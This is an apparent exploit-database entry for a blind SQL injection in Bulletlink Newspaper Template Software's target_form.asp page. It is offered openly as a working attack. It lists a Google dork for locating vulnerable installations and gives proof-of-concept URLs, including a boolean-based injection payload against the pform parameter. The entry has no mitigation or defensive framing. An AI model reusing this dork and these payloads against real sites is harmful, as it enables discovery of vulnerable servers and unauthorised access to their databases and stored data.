# Exploit Title: Bulletlink Newspaper Template Software (target_form.asp) 0day Blind SQL-Injection # Date: 09/11/2011 # Author: easypwn # Vendor or Software Link: http://www.bulletlink.com # Category: webapps # Google dork: allinurl:target_form.asp?pform= # Tested on: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server) PoC: http://localhost/target_form.asp?pform={{DeleteMember}}'SQLi Demo: http://localhost/target_form.asp?pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy